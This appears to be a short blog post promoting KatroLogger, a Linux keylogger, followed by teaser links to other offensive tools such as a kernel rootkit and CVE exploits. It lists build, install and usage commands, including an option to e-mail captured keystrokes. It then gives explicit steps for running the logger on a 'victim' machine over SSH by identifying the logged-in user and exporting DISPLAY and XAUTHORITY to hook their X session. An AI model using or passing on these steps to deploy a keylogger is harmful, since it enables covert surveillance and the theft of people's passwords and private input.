KatroLogger is a tool used for KeyLogger for Linux Systems.
Features
Dependencies
Compiling
./configure
make
make install
Also Read – Atlas : Quick SQLMap Tamper Suggester v1.0
Usage
katrologger –output /path/file
Send data by e-mail:
katrologger –smtp-help
when connecting to the victim remotely via ssh it will be necessary to export environment variables to run the keylogger.
identifying logged in user
user=$(who | grep “(:0)” | awk ‘{print $1}’)
echo $user
Exporting Variables
export DISPLAY=:0.0
export XAUTHORITY=/home/$user/.Xauthority
Uninstall
make uninstall
shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…
Extract and execute a PE embedded within a PNG file using an LNK file. The…
Embark on the journey of becoming a certified Red Team professional with our definitive guide.…
This repository contains proof of concept exploits for CVE-2024-5836 and CVE-2024-6778, which are vulnerabilities within…
This took me like 4 days (+2 days for an update), but I got it…
MaLDAPtive is a framework for LDAP SearchFilter parsing, obfuscation, deobfuscation and detection. Its foundation is…